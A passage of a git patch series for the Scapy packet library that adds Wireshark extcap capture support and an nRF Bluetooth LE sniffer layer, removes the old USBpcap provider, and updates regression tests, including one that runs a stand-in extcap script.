OSError(ctypes.FormatError()) + return buf.raw + def close(self) -> None: + # ignore failures + ctypes.windll.kernel32.CloseHandle(fd) + return _opened() # type: ignore \ No newline at end of file diff --git a/scapy/config.py b/scapy/config.py index 639d19e7556..4ffc88324d7 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -148,6 +148,10 @@ class ProgPath(ConfClass): tshark = "tshark" wireshark = "wireshark" ifconfig = "ifconfig" + extcap_folders = [ + os.path.join(os.path.expanduser("~"), ".config", "wireshark", "extcap"), + "/usr/lib/x86_64-linux-gnu/wireshark/extcap", + ] class ConfigFieldList: @@ -616,9 +620,7 @@ def _set_conf_sockets(): L3pcapSocket, filter="ip6") conf.L2socket = L2pcapSocket conf.L2listen = L2pcapListenSocket - conf.ifaces.reload() - return - if conf.use_bpf: + elif conf.use_bpf: from scapy.arch.bpf.supersocket import L2bpfListenSocket, \ L2bpfSocket, L3bpfSocket conf.L3socket = L3bpfSocket @@ -626,9 +628,7 @@ def _set_conf_sockets(): L3bpfSocket, filter="ip6") conf.L2socket = L2bpfSocket conf.L2listen = L2bpfListenSocket - conf.ifaces.reload() - return - if LINUX: + elif LINUX: from scapy.arch.linux import L3PacketSocket, L2Socket, L2ListenSocket conf.L3socket = L3PacketSocket conf.L3socket6 = cast( @@ -640,23 +640,20 @@ def _set_conf_sockets(): ) conf.L2socket = L2Socket conf.L2listen = L2ListenSocket - conf.ifaces.reload() - return - if WINDOWS: + elif WINDOWS: from scapy.arch.windows import _NotAvailableSocket from scapy.arch.windows.native import L3WinSocket, L3WinSocket6 conf.L3socket = L3WinSocket conf.L3socket6 = L3WinSocket6 conf.L2socket = _NotAvailableSocket conf.L2listen = _NotAvailableSocket - conf.ifaces.reload() - # No need to update globals on Windows - return else: from scapy.supersocket import L3RawSocket from scapy.layers.inet6 import L3RawSocket6 conf.L3socket = L3RawSocket conf.L3socket6 = L3RawSocket6 + # Reload the interfaces + conf.ifaces.reload() def _socket_changer(attr, val, old): @@ -761,7 +758,6 @@ class Conf(ConfClass): L2socket = None # type: Type[scapy.supersocket.SuperSocket] L2listen = None # type: Type[scapy.supersocket.SuperSocket] BTsocket = None # type: Type[scapy.supersocket.SuperSocket] - USBsocket = None # type: Type[scapy.supersocket.SuperSocket] min_pkt_size = 60 #: holds MIB direct access dictionary mib = None # type: 'scapy.asn1.mib.MIBDict' @@ -827,8 +823,6 @@ class Conf(ConfClass): use_bpf = Interceptor("use_bpf", False, _socket_changer) use_npcap = False ipv6_enabled = socket.has_ipv6 - #: path or list of paths where extensions are to be looked for - extensions_paths = "." stats_classic_protocols = [] # type: List[Type[Packet]] stats_dot11_protocols = [] # type: List[Type[Packet]] temp_files = [] # type: List[str] diff --git a/scapy/contrib/nrf_sniffer.py b/scapy/contrib/nrf_sniffer.py new file mode 100644 index 00000000000..86ba91dfce2 --- /dev/null +++ b/scapy/contrib/nrf_sniffer.py @@ -0,0 +1,154 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Michael Farrell + +""" +nRF sniffer + +Firmware and documentation related to this module is available at: +https://www.nordicsemi.com/Software-and-Tools/Development-Tools/nRF-Sniffer +https://github.com/adafruit/Adafruit_BLESniffer_Python +https://github.com/wireshark/wireshark/blob/master/epan/dissectors/packet-nordic_ble.c +""" + +# scapy.contrib.description = nRF sniffer +# scapy.contrib.status = works + +import struct + +from scapy.config import conf +from scapy.data import DLT_NORDIC_BLE +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + LEIntField, + LEShortField, + LenField, + ScalingField, +) +from scapy.layers.bluetooth4LE import BTLE +from scapy.packet import Packet, bind_layers + + +# nRF Sniffer v2 + + +class NRFS2_Packet(Packet): + """ + nRF Sniffer v2 Packet + """ + + fields_desc = [ + LenField("len", None, fmt=" Tuple[str, str, str, List[str], List[str]] + # type: (...) -> Tuple[Union[str, List[str]], ...] """Returns the elements used by show() If a tuple is returned, this consist of the strings that will be @@ -97,6 +97,12 @@ def _format(self, index = str(dev.index) return (index, dev.description, mac or "", dev.ips[4], dev.ips[6]) + def __repr__(self) -> str: + """ + repr + """ + return "" % self.name + class NetworkInterface(object): def __init__(self, @@ -171,7 +177,7 @@ def l2listen(self): # type: () -> Type[scapy.supersocket.SuperSocket] return self.provider._l2listen(self) - def l3socket(self, ipv6): + def l3socket(self, ipv6=False): # type: (bool) -> Type[scapy.supersocket.SuperSocket] return self.provider._l3socket(self, ipv6) @@ -222,6 +228,9 @@ def register_provider(self, provider): # type: (type) -> None prov = provider() self.providers[provider] = prov + if self.data: + # late registration + self._load(prov.reload(), prov) def load_confiface(self): # type: () -> None @@ -242,8 +251,10 @@ def _reload_provs(self): def reload(self): # type: () -> None self._reload_provs() - if conf.route: - self.load_confiface() + if not conf.route: + # routes are not loaded yet. + return + self.load_confiface() def dev_from_name(self, name): # type: (str) -> NetworkInterface @@ -326,15 +337,16 @@ def show(self, print_result=True, hidden=False, **kwargs): if not hidden and not dev.is_valid(): continue prov = dev.provider - res[prov].append( + res[(prov.headers, prov.header_sort)].append( (prov.name,) + prov._format(dev, **kwargs) ) output = "" - for provider in res: + for key in res: + hdrs, sortBy = key output += pretty_list( - res[provider], # type: ignore - [("Source",) + provider.headers], - sortBy=provider.header_sort + res[key], + [("Source",) + hdrs], + sortBy=sortBy ) + "\n" output = output[:-1] if print_result: diff --git a/scapy/layers/bluetooth4LE.py b/scapy/layers/bluetooth4LE.py index cd1abb429c8..0611d3edd26 100644 --- a/scapy/layers/bluetooth4LE.py +++ b/scapy/layers/bluetooth4LE.py @@ -11,8 +11,11 @@ from scapy.compat import orb, chb from scapy.config import conf -from scapy.data import DLT_BLUETOOTH_LE_LL, DLT_BLUETOOTH_LE_LL_WITH_PHDR, \ - PPI_BTLE +from scapy.data import ( + DLT_BLUETOOTH_LE_LL, + DLT_BLUETOOTH_LE_LL_WITH_PHDR, + PPI_BTLE, +) from scapy.packet import Packet, bind_layers from scapy.fields import ( BitEnumField, diff --git a/scapy/layers/usb.py b/scapy/layers/usb.py index c7313b862f3..d5a7f39837c 100644 --- a/scapy/layers/usb.py +++ b/scapy/layers/usb.py @@ -10,22 +10,14 @@ # TODO: support USB headers for Linux and Darwin (usbmon/netmon) # https://github.com/wireshark/wireshark/blob/master/epan/dissectors/packet-usb.c # noqa: E501 -import re -import subprocess - from scapy.config import conf -from scapy.consts import WINDOWS -from scapy.compat import chb, plain_str -from scapy.data import MTU, DLT_USBPCAP -from scapy.error import warning +from scapy.compat import chb +from scapy.data import DLT_USBPCAP from scapy.fields import ByteField, XByteField, ByteEnumField, LEShortField, \ LEShortEnumField, LEIntField, LEIntEnumField, XLELongField, \ LenField -from scapy.interfaces import NetworkInterface, InterfaceProvider, \ - network_name, IFACES from scapy.packet import Packet, bind_top_down -from scapy.supersocket import SuperSocket -from scapy.utils import PcapReader + # USBpcap @@ -152,134 +144,3 @@ class USBpcapTransferControl(Packet): bind_top_down(USBpcap, USBpcapTransferControl, transfer=2) conf.l2types.register(DLT_USBPCAP, USBpcap) - - -def _extcap_call(prog, args, keyword, values): - """Function used to call a program using the extcap format, - then parse the results""" - p = subprocess.Popen( - [prog] + args, - stdout=subprocess.PIPE, stderr=subprocess.PIPE - ) - data, err = p.communicate() - if p.returncode != 0: - raise OSError("%s returned with error code %s: %s" % (prog, - p.returncode, - err)) - data = plain_str(data) - res = [] - for ifa in data.split("\n"): - ifa = ifa.strip() - if not ifa.startswith(keyword): - continue - res.append(tuple([re.search(r"{%s=([^}]*)}" % val, ifa).group(1) - for val in values])) - return res - - -if WINDOWS: - def _usbpcap_check(): - if not conf.prog.usbpcapcmd: - raise OSError("USBpcap is not installed ! (USBpcapCMD not found)") - - def get_usbpcap_interfaces(): - """Return a list of available USBpcap interfaces""" - _usbpcap_check() - return _extcap_call( - conf.prog.usbpcapcmd, - ["--extcap-interfaces"], - "interface", - ["value", "display"] - ) - - class UsbpcapInterfaceProvider(InterfaceProvider): - name = "USBPcap" - headers = ("Index", "Name", "Address") - header_sort = 1 - - def load(self): - data = {} - try: - interfaces = get_usbpcap_interfaces() - except OSError: - return {} - for netw_name, name in interfaces: - index = re.search(r".*(\d+)", name) - if index: - index = int(index.group(1)) + 100 - else: - index = 100 - if_data = { - "name": name, - "network_name": netw_name, - "description": name, - "index": index, - } - data[netw_name] = NetworkInterface(self, if_data) - return data - - def l2socket(self): - return conf.USBsocket - l2listen = l2socket - - def l3socket(self): - raise ValueError("No L3 available for USBpcap !") - - def _format(self, dev, **kwargs): - """Returns a tuple of the elements used by show()""" - return (str(dev.index), dev.name, dev.network_name) - - IFACES.register_provider(UsbpcapInterfaceProvider) - - def get_usbpcap_devices(iface, enabled=True): - """Return a list of devices on an USBpcap interface""" - _usbpcap_check() - devices = _extcap_call( - conf.prog.usbpcapcmd, - ["--extcap-interface", - iface, - "--extcap-config"], - "value", - ["value", "display", "enabled"] - ) - devices = [(dev[0], - dev[1], - dev[2] == "true") for dev in devices] - if enabled: - return [dev for dev in devices if dev[2]] - return devices - - class USBpcapSocket(SuperSocket): - """ - Read packets at layer 2 using USBPcapCMD - """ - nonblocking_socket = True - - @staticmethod - def select(sockets, remain=None): - return sockets - - def __init__(self, iface=None, *args, **karg): - _usbpcap_check() - if iface is None: - warning("Available interfaces: [%s]", - " ".join(x[0] for x in get_usbpcap_interfaces())) - raise NameError("No interface specified !" - " See get_usbpcap_interfaces()") - iface = network_name(iface) - self.outs = None - args = ['-d', iface, '-b', '134217728', '-A', '-o', '-'] - self.usbpcap_proc = subprocess.Popen( - [conf.prog.usbpcapcmd] + args, - stdout=subprocess.PIPE, stderr=subprocess.PIPE - ) - self.ins = PcapReader(self.usbpcap_proc.stdout) - - def recv(self, x=MTU): - return self.ins.recv(x) - - def close(self): - SuperSocket.close(self) - self.usbpcap_proc.kill() - - conf.USBsocket = USBpcapSocket diff --git a/scapy/libs/extcap.py b/scapy/libs/extcap.py new file mode 100644 index 00000000000..b61912e057a --- /dev/null +++ b/scapy/libs/extcap.py @@ -0,0 +1,254 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +Wireshark extcap API utils +https://www.wireshark.org/docs/wsdg_html_chunked/ChCaptureExtcap.html +""" + +import collections +import functools +import pathlib +import re +import subprocess + +from scapy.config import conf +from scapy.consts import WINDOWS +from scapy.data import MTU +from scapy.error import warning +from scapy.interfaces import ( + network_name, + resolve_iface, + InterfaceProvider, + NetworkInterface, +) +from scapy.packet import Packet +from scapy.supersocket import SuperSocket +from scapy.utils import PcapReader, _create_fifo, _open_fifo + +# Typing +from typing import ( + cast, + Any, + Dict, + List, + NoReturn, + Optional, + Tuple, + Type, + Union, +) + + +def _extcap_call(prog: str, + args: List[str], + format: Dict[str, List[str]], + ) -> Dict[str, List[Tuple[str, ...]]]: + """ + Function used to call a program using the extcap format, + then parse the results + """ + p = subprocess.Popen( + [prog] + args, + stdout=subprocess.PIPE, stderr=subprocess.PIPE, + text=True + ) + data, err = p.communicate() + if p.returncode != 0: + raise OSError("%s returned with error code %s: %s" % (prog, p.returncode, err)) + res = collections.defaultdict(list) + for ifa in data.split("\n"): + ifa = ifa.strip() + for keyword, values in format.items(): + if not ifa.startswith(keyword): + continue + + def _match(val: str, ifa: str) -> str: + m = re.search(r"{%s=([^}]*)}" % val, ifa) + if m: + return m.group(1) + return "" + res[keyword].append( + tuple( + [_match(val, ifa) for val in values] + ) + ) + break + return cast(Dict[str, List[Tuple[str, ...]]], res) + + +class _ExtcapNetworkInterface(NetworkInterface): + """ + Extcap NetworkInterface + """ + + def get_extcap_config(self) -> Dict[str, Tuple[str, ...]]: + """ + Return a list of available configuration options on an extcap interface + """ + return _extcap_call( + self.provider.cmdprog, # type: ignore + ["--extcap-interface", self.network_name, "--extcap-config"], + { + "arg": ["number", "call", "display", "default", "required"], + "value": ["arg", "value", "display", "default"], + }, + ) + + def get_extcap_cmd(self, **kwarg: Dict[str, str]) -> List[str]: + """ + Return the extcap command line options + """ + cmds = [] + for x in self.get_extcap_config()["arg"]: + key = x[1].strip("-").replace("-", "_") + if key in kwarg: + # Apply argument + cmds += [x[1], str(kwarg[key])] + else: + # Apply default + if x[4] == "true": # required + raise ValueError( + "Missing required argument: '%s' on iface %s." % ( + key, + self.network_name, + ) + ) + elif not x[3] or x[3] == "false": # no default (or false) + continue + if x[3] == "true": + cmds += [x[1]] + else: + cmds += [x[1], x[3]] + return cmds + + +class _ExtcapSocket(SuperSocket): + """ + Read packets at layer 2 using an extcap command + """ + + nonblocking_socket = True + + @staticmethod + def select(sockets: List[SuperSocket], + remain: Optional[float] = None) -> List[SuperSocket]: + return sockets + + def __init__(self, *_: Any, **kwarg: Any) -> None: + cmdprog = kwarg.pop("cmdprog") + iface = kwarg.pop("iface", None) + if iface is None: + raise NameError("Must select an interface for a extcap socket !") + iface = resolve_iface(iface) + if not isinstance(iface, _ExtcapNetworkInterface): + raise ValueError("Interface should be an _ExtcapNetworkInterface") + args = iface.get_extcap_cmd(**kwarg) + iface = network_name(iface) + self.outs = None # extcap sockets can't write + # open fifo + fifo, fd = _create_fifo() + args = ["--extcap-interface", iface, "--capture", "--fifo", fifo] + args + self.proc = subprocess.Popen( + [cmdprog] + args, + ) + self.fd = _open_fifo(fd) + self.reader = PcapReader(self.fd) # type: ignore + self.ins = self.reader # type: ignore + + def recv(self, x: int = MTU) -> Packet: + return self.reader.recv(x) + + def close(self) -> None: + self.proc.kill() + self.proc.wait(timeout=2) + SuperSocket.close(self) + self.fd.close() + + +class _ExtcapInterfaceProvider(InterfaceProvider): + """ + Interface provider made to hook on a extcap binary + """ + + headers = ("Index", "Name", "Address") + header_sort = 1 + + def __init__(self, *args: Any, **kwargs: Any) -> None: + self.cmdprog = kwargs.pop("cmdprog") + super(_ExtcapInterfaceProvider, self).__init__(*args, **kwargs) + + def load(self) -> Dict[str, NetworkInterface]: + data: Dict[str, NetworkInterface] = {} + try: + interfaces = _extcap_call( + self.cmdprog, + ["--extcap-interfaces"], + {"interface": ["value", "display"]}, + )["interface"] + except OSError as ex: + warning( + "extcap %s failed to load: %s", + self.name, + str(ex).strip().split("\n")[-1] + ) + return {} + for netw_name, name in interfaces: + _index = re.search(r".*(\d+)", name) + if _index: + index = int(_index.group(1)) + 100 + else: + index = 100 + if_data = { + "name": name, + "network_name": netw_name, + "description": name, + "index": index, + } + data[netw_name] = _ExtcapNetworkInterface(self, if_data) + return data + + def _l2listen(self, _: Any) -> Type[SuperSocket]: + return functools.partial(_ExtcapSocket, cmdprog=self.cmdprog) # type: ignore + + def _l3socket(self, *_: Any) -> NoReturn: + raise ValueError("Only sniffing is available for an extcap provider !") + + _l2socket = _l3socket # type: ignore + + def _is_valid(self, dev: NetworkInterface) -> bool: + return True + + def _format(self, + dev: NetworkInterface, + **kwargs: Any + ) -> Tuple[Union[str, List[str]], ...]: + """Returns a tuple of the elements used by show()""" + return (str(dev.index), dev.name, dev.network_name) + + +def load_extcap() -> None: + """ + Load extcap folder from wireshark and populate providers + """ + if WINDOWS: + pattern = re.compile(r"^[^.]+(?:\.bat|\.exe)?$") + else: + pattern = re.compile(r"^[^.]+(?:\.sh)?$") + for fld in conf.prog.extcap_folders: + root = pathlib.Path(fld) + for _cmdprog in root.glob("*"): + if not _cmdprog.is_file() or not pattern.match(_cmdprog.name): + continue + cmdprog = str((root / _cmdprog).absolute()) + # success + provname = pathlib.Path(cmdprog).name.rsplit(".", 1)[0] + + class _prov(_ExtcapInterfaceProvider): + name = provname + + conf.ifaces.register_provider( + functools.partial(_prov, cmdprog=cmdprog) # type: ignore + ) diff --git a/scapy/route.py b/scapy/route.py index cb36fa181ab..a811aff9e0f 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -215,5 +215,5 @@ def get_if_bcast(self, iff): conf.route = Route() -# Load everything, update conf.iface -conf.ifaces.reload() +# Update conf.iface +conf.ifaces.load_confiface() diff --git a/scapy/utils.py b/scapy/utils.py index 1b58464f343..6c6fd2dfa7e 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -181,12 +181,12 @@ def get_temp_file(keep, autoext, fd): @overload -def get_temp_file(keep=False, autoext="", fd=False): # noqa: F811 +def get_temp_file(keep=False, autoext="", fd=False): # type: (bool, str, Literal[False]) -> str pass -def get_temp_file(keep=False, autoext="", fd=False): # noqa: F811 +def get_temp_file(keep=False, autoext="", fd=False): # type: (bool, str, bool) -> Union[IO[bytes], str] """Creates a temporary file. @@ -225,6 +225,34 @@ def get_temp_dir(keep=False): return dname +def _create_fifo() -> Tuple[str, Any]: + """Creates a temporary fifo. + + You must then use open_fifo() on the server_fd once + the client is connected to use it. + + :returns: (client_file, server_fd) + """ + if WINDOWS: + from scapy.arch.windows.structures import _get_win_fifo + return _get_win_fifo() + else: + f = get_temp_file() + os.unlink(f) + os.mkfifo(f) + return f, f + + +def _open_fifo(fd: Any, mode: str = "rb") -> IO[bytes]: + """Open the server_fd (see create_fifo) + """ + if WINDOWS: + from scapy.arch.windows.structures import _win_fifo_open + return _win_fifo_open(fd) + else: + return open(fd, mode) + + def sane(x, color=False): # type: (AnyStr, bool) -> str r = "" diff --git a/test/regression.uts b/test/regression.uts index 3f36ec9c47a..c1a1ad0c7f6 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -345,6 +345,95 @@ assert output == data conf.ifaces.reload() += Test extcap detection in conf.ifaces +~ linux extcap + +import os +from scapy.libs.extcap import load_extcap + +_bkp_extcap = conf.prog.extcap_folders +_bkp_providers = conf.ifaces.providers.copy() + +conf.ifaces.providers.clear() + +# Create some sort of extcap parody program +extcapfld = get_temp_dir() +extcapprog = os.path.join(extcapfld, "runner.sh") +data = """#!/usr/bin/env python3 + +import struct +import argparse +parser = argparse.ArgumentParser() +parser.add_argument('--extcap-interfaces', action='store_true') +parser.add_argument('--capture', action='store_true') +parser.add_argument('--extcap-config', action='store_true') +parser.add_argument('--scan-follow-rsp', action='store_true') +parser.add_argument('--scan-follow-aux', action='store_true') +parser.add_argument('--extcap-interface', type=str) +parser.add_argument('--fifo', type=str) + +args = parser.parse_args() +if args.extcap_interfaces: + # List interfaces + print(bytes.fromhex("0a657874636170207b76657273696f6e3d342e312e317d7b646973706c61793d6e524620536e696666657220666f7220426c7565746f6f7468204c457d7b68656c703d68747470733a2f2f7777772e6e6f7264696373656d692e636f6d2f536f6674776172652d616e642d546f6f6c732f446576656c6f706d656e742d546f6f6c732f6e52462d536e69666665722d666f722d426c7565746f6f74682d4c457d0a696e74657266616365207b76616c75653d2f6465762f747479555342352d4e6f6e657d7b646973706c61793d6e524620536e696666657220666f7220426c7565746f6f7468204c457d0a636f6e74726f6c207b6e756d6265723d307d7b747970653d73656c6563746f727d7b646973706c61793d4465766963657d7b746f6f6c7469703d446576696365206c6973747d0a636f6e74726f6c207b6e756d6265723d317d7b747970653d73656c6563746f727d7b646973706c61793d4b65797d7b746f6f6c7469703d7d0a636f6e74726f6c207b6e756d6265723d327d7b747970653d737472696e677d7b646973706c61793d56616c75657d7b746f6f6c7469703d3620646967697420706173736b6579206f72203136206f7220333220627974657320656e6372797074696f6e206b657920696e2068657861646563696d616c207374617274696e67207769746820273078272c2062696720656e6469616e20666f726d61742e49662074686520656e7465726564206b65792069732073686f72746572207468616e203136206f722033322062797465732c2069742077696c6c206265207a65726f2d70616464656420696e2066726f6e74277d7b76616c69646174696f6e3d5c625e28285b302d395d7b367d297c2830785b302d39612d66412d465d7b312c36347d297c285b302d39412d46612d665d7b327d5b3a2d5d297b357d285b302d39412d46612d665d7b327d2920287075626c69637c72616e646f6d2929245c627d0a636f6e74726f6c207b6e756d6265723d337d7b747970653d737472696e677d7b646973706c61793d41647620486f707d7b64656661756c743d33372c33382c33397d7b746f6f6c7469703d4164766572746973696e67206368616e6e656c20686f702073657175656e63652e204368616e676520746865206f7264657220696e2077686963682074686520736e6966666572207377697463686573206164766572746973696e67206368616e6e656c732e2056616c6964206368616e6e656c73206172652033372c20333820616e642033392073657061726174656420627920636f6d6d612e7d7b76616c69646174696f6e3d5e5c732a282833377c33387c3339295c732a2c5c732a297b302c327d2833377c33387c3339297b317d5c732a247d7b72657175697265643d747275657d0a636f6e74726f6c207b6e756d6265723d377d7b747970653d627574746f6e7d7b646973706c61793d436c6561727d7b746f6f6c746f703d436c656172206f722072656d6f7665206465766963652066726f6d20446576696365206c6973747d0a636f6e74726f6c207b6e756d6265723d347d7b747970653d627574746f6e7d7b726f6c653d68656c707d7b646973706c61793d48656c707d7b746f6f6c7469703d416363657373207573657220677569646520286c61756e636865732062726f77736572297d0a636f6e74726f6c207b6e756d6265723d357d7b747970653d627574746f6e7d7b726f6c653d726573746f72657d7b646973706c61793d44656661756c74737d7b746f6f6c7469703d52657365747320746865207573657220696e7465726661636520616e6420636c6561727320746865206c6f672066696c657d0a636f6e74726f6c207b6e756d6265723d367d7b747970653d627574746f6e7d7b726f6c653d6c6f676765727d7b646973706c61793d4c6f677d7b746f6f6c7469703d4c6f672070657220696e746572666163657d0a76616c7565207b636f6e74726f6c3d307d7b76616c75653d207d7b646973706c61793d416c6c206164766572746973696e6720646576696365737d7b64656661756c743d747275657d0a76616c7565207b636f6e74726f6c3d307d7b76616c75653d5b30302c30302c30302c30302c30302c30302c305d7d7b646973706c61793d466f6c6c6f772049524b7d0a76616c7565207b636f6e74726f6c3d317d7b76616c75653d307d7b646973706c61793d4c656761637920506173736b65797d7b64656661756c743d747275657d0a76616c7565207b636f6e74726f6c3d317d7b76616c75653d317d7b646973706c61793d4c6567616379204f4f4220646174617d0a76616c7565207b636f6e74726f6c3d317d7b76616c75653d327d7b646973706c61793d4c6567616379204c544b7d0a76616c7565207b636f6e74726f6c3d317d7b76616c75653d337d7b646973706c61793d5343204c544b7d0a76616c7565207b636f6e74726f6c3d317d7b76616c75653d347d7b646973706c61793d53432050726976617465204b65797d0a76616c7565207b636f6e74726f6c3d317d7b76616c75653d357d7b646973706c61793d49524b7d0a76616c7565207b636f6e74726f6c3d317d7b76616c75653d367d7b646973706c61793d416464204c4520616464726573737d0a76616c7565207b636f6e74726f6c3d317d7b76616c75653d377d7b646973706c61793d466f6c6c6f77204c4520616464726573737d").decode()) +elif args.extcap_interface and args.extcap_config: + # List config + print(bytes.fromhex("617267207b6e756d6265723d307d7b63616c6c3d2d2d6f6e6c792d6164766572746973696e677d7b646973706c61793d4f6e6c79206164766572746973696e67207061636b6574737d7b746f6f6c7469703d54686520736e69666665722077696c6c206f6e6c792063617074757265206164766572746973696e67207061636b6574732066726f6d207468652073656c6563746564206465766963657d7b747970653d626f6f6c666c61677d7b736176653d747275657d0a617267207b6e756d6265723d317d7b63616c6c3d2d2d6f6e6c792d6c65676163792d6164766572746973696e677d7b646973706c61793d4f6e6c79206c6567616379206164766572746973696e67207061636b6574737d7b746f6f6c7469703d54686520736e69666665722077696c6c206f6e6c792063617074757265206c6567616379206164766572746973696e67207061636b6574732066726f6d207468652073656c6563746564206465766963657d7b747970653d626f6f6c666c61677d7b736176653d747275657d0a617267207b6e756d6265723d327d7b63616c6c3d2d2d7363616e2d666f6c6c6f772d7273707d7b646973706c61793d46696e64207363616e20726573706f6e736520646174617d7b746f6f6c7469703d54686520736e69666665722077696c6c20666f6c6c6f77207363616e20726571756573747320616e64207363616e20726573706f6e73657320696e207363616e206d6f64657d7b747970653d626f6f6c666c61677d7b64656661756c743d747275657d7b736176653d747275657d0a617267207b6e756d6265723d337d7b63616c6c3d2d2d7363616e2d666f6c6c6f772d6175787d7b646973706c61793d46696e6420617578696c6961727920706f696e74657220646174617d7b746f6f6c7469703d54686520736e69666665722077696c6c20666f6c6c6f772061757820706f696e7465727320696e207363616e206d6f64657d7b747970653d626f6f6c666c61677d7b64656661756c743d747275657d7b736176653d747275657d0a617267207b6e756d6265723d337d7b63616c6c3d2d2d636f6465647d7b646973706c61793d5363616e20616e6420666f6c6c6f772064657669636573206f6e204c4520436f646564205048597d7b746f6f6c7469703d5363616e20666f72206465766963657320616e6420666f6c6c6f772061647665727469736572206f6e204c4520436f646564205048597d7b747970653d626f6f6c666c61677d7b64656661756c743d66616c73657d7b736176653d747275657d").decode()) +elif args.capture and args.extcap_interface and args.fifo: + # Capture + pkts = [ + bytes.fromhex("ffffffffffff00000000000008004500001c0001000040117cce7f0000017f0000010035003500080172") + ] + with open(args.fifo, "wb", 0) as fd: + # header + fd.write( + struct.pack( + "IHHIIII", + 0xa1b2c3d4, + 2, 4, 0, 0, 65535, 1 + ) + ) + for pkt in pkts: + fd.write(struct.pack("IIII", 0, 0, len(pkt), len(pkt))) + fd.write(bytes(pkt)) +else: + raise ValueError("Bad arguments") +""".strip() +with open(extcapprog, "w") as fd: + fd.write(data) + +print(data) + +os.chmod(extcapprog, 0o777) + +# Inject and load provider +conf.prog.extcap_folders = [extcapfld] +load_extcap() +print(conf.ifaces.providers) +conf.ifaces.reload() + +# Now do the tests +iface = conf.ifaces.dev_from_networkname('/dev/ttyUSB5-None') +assert iface.name == "nRF Sniffer for Bluetooth LE" +sock = iface.l2listen()(iface=iface) +pkts = sock.sniff(timeout=2) +sock.close() +assert UDP in pkts[0] + +config = iface.get_extcap_config() +assert config["arg"] == [ + ('0', '--only-advertising', 'Only advertising packets', '', ''), + ('1', '--only-legacy-advertising', 'Only legacy advertising packets', '', ''), + ('2', '--scan-follow-rsp', 'Find scan response data', 'true', ''), + ('3', '--scan-follow-aux', 'Find auxiliary pointer data', 'true', ''), + ('3', '--coded', 'Scan and follow devices on LE Coded PHY', 'false', '') +] + +# Restore +conf.prog.extcap_folders = _bkp_extcap +conf.ifaces.providers = _bkp_providers +conf.ifaces.reload() + = Test read_routes6() - default output routes6 = read_routes6() diff --git a/test/scapy/layers/usb.uts b/test/scapy/layers/usb.uts index d70878b2145..1ef2aaf197f 100644 --- a/test/scapy/layers/usb.uts +++ b/test/scapy/layers/usb.uts @@ -36,55 +36,3 @@ assert raw(pkt) == b"'\x00u\x925\x00\x00\x00\x00\x00\x00\x00\x00\x005\x12\n#\x00 pkt = USBpcap(irpId=0x359275, function=0x1235, info=10, bus=35)/USBpcapTransferControl(stage=11) assert raw(pkt) == b'\x1c\x00u\x925\x00\x00\x00\x00\x00\x00\x00\x00\x005\x12\n#\x00\x00\x00\x00\x02\x01\x00\x00\x00\x0b' - -= mocked get_usbpcap_interfaces() -~ mock windows - -import mock - -@mock.patch("scapy.layers.usb.subprocess.Popen") -def test_get_usbpcap_interfaces(mock_Popen): - conf.prog.usbpcapcmd = "C:/the_program_is_not_installed__test_only" - data = """ -interface {value=\\\\.\\USBPcap1}{display=USBPcap1} -""" - mock_Popen.side_effect = lambda *args, **kwargs: Bunch(returncode=0, communicate=(lambda *args, **kargs: (data,None))) - assert get_usbpcap_interfaces() == [('\\\\.\\USBPcap1', 'USBPcap1')] - - -test_get_usbpcap_interfaces() - -= mocked get_usbpcap_devices() -~ mock windows - -import mock - -@mock.patch("scapy.layers.usb.subprocess.Popen") -def test_get_usbpcap_devices(mock_Popen): - conf.prog.usbpcapcmd = "C:/the_program_is_not_installed__test_only" - data = """ -arg {number=0}{call=--snaplen}{display=Snapshot length}{tooltip=Snapshot length}{type=integer}{range=0,65535}{default=65535} -arg {number=1}{call=--bufferlen}{display=Capture buffer length}{tooltip=USBPcap kernel-mode capture buffer length in bytes}{type=integer}{range=0,134217728}{default=1048576} -arg {number=2}{call=--capture-from-all-devices}{display=Capture from all devices connected}{tooltip=Capture from all devices connected despite other options}{type=boolflag}{default=true} -arg {number=3}{call=--capture-from-new-devices}{display=Capture from newly connected devices}{tooltip=Automatically start capture on all newly connected devices}{type=boolflag}{default=true} -arg {number=99}{call=--devices}{display=Attached USB Devices}{tooltip=Select individual devices to capture from}{type=multicheck} -value {arg=99}{value=2}{display=[2] Marvell AVASTAR Bluetooth Radio Adapter}{enabled=true} -value {arg=99}{value=3}{display=[3] Peripherique d entree USB}{enabled=true} -value {arg=99}{value=3_1}{display=Surface Type Cover Filter Device}{enabled=false}{parent=3} -value {arg=99}{value=3_2}{display=Souris HID}{enabled=false}{parent=3} -value {arg=99}{value=3_3}{display=Peripherique de control consommateur conforme aux Peripheriques d'interface utilisateur (HID)}{enabled=false}{parent=3} -value {arg=99}{value=3_4}{display=Surface Pro 4 Type Cover Integration}{enabled=false}{parent=3} -value {arg=99}{value=3_5}{display=Surface Keyboard Backlight}{enabled=false}{parent=3_4} -value {arg=99}{value=3_6}{display=Surface Pro 4 Firmware Update}{enabled=false}{parent=3_4} -value {arg=99}{value=3_7}{display=Peripherique fournisseur HID}{enabled=false}{parent=3} -value {arg=99}{value=3_8}{display=Surface PTP Filter}{enabled=false}{parent=3} -value {arg=99}{value=3_9}{display=Microsoft Input Configuration Device}{enabled=false}{parent=3} -value {arg=99}{value=3_10}{display=Peripherique fournisseur HID}{enabled=false}{parent=3} -value {arg=99}{value=3_11}{display=Peripherique fournisseur HID}{enabled=false}{parent=3} -value {arg=99}{value=3_12}{display=Peripherique fournisseur HID}{enabled=false}{parent=3} -""" - mock_Popen.side_effect = lambda *args, **kwargs: Bunch(returncode=0, communicate=(lambda *args, **kargs: (data,None))) - assert get_usbpcap_devices('\\\\.\\USBPcap1') == [('2', '[2] Marvell AVASTAR Bluetooth Radio Adapter', True),('3', '[3] Peripherique d entree USB', True)] - - -test_get_usbpcap_devices() From 353b2413f41c01eeacf3516eebc70821c82f70ef Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 7 Sep 2023 21:57:38 +0200 Subject: [PATCH 1085/1632] Let Scapy load on unsupported platforms (#4111) --- scapy/arch/__init__.py | 21 